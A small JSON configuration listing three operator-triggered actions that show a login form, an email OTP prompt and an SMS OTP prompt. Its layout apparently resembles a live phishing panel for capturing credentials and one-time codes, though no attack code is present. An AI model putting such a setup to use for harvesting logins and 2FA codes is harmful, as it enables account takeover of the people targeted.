[
  {
    "button": "Ask Login",
    "title": "Login",
    "init_fn": "ask_login",
    "id": "login",
    "sql_ms": "Operation `Ask Login` added successfully",
    "success_mes": "Login form displayed",
    "desc": "Some extra information"
  },
  {
    "button": "Ask OTP",
    "title": "OTP",
    "init_fn": "ask_otp",
    "id": "otp",
    "sql_ms": "Operation `Ask OTP` added successfully",
    "success_mes": "OTP form displayed",
    "desc": "OTP from E-Mail"
  },
  {
    "button": "Ask SMS",
    "title": "SMS",
    "init_fn": "ask_sms",
    "id": "sms",
    "sql_ms": "Operation `Ask SMS` added successfully",
    "success_mes": "SMS form displayed",
    "desc": "OTP from SMS"
  }
]